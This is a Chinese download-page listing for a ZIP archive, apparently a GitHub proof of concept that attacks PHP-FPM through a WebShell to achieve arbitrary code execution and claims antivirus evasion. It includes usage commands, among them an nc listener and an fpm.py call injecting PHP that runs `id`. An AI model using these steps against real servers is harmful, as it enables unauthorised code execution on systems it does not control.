【文件属性】:
文件名称:php-fpm:用WebShell攻击PHP-FPM用WebShell攻击PHP-FPM
文件大小:176KB
文件格式:ZIP
更新时间:2021-03-11 14:40:20
Python
用WebShell攻击PHP-FPM
来自大佬的文末一个想法
快速实现了一个poc,可以实现任意代码执行
后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的
使用
测试php7.3-fpm,在TCP模式和本地socket都可以运行
echo "<?php echo 1; ?>" > /tmp/poc.php
nc -lvp 6666 > payload.txt
python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php
运行poc.php
php poc.php
参考
fpm.py来自
【文件预览】:
php-fpm-master
----poc.php(416B)
----poc.png(175KB)
----fpm.py(8KB)
----.gitignore(12B)
----readme.md(866B)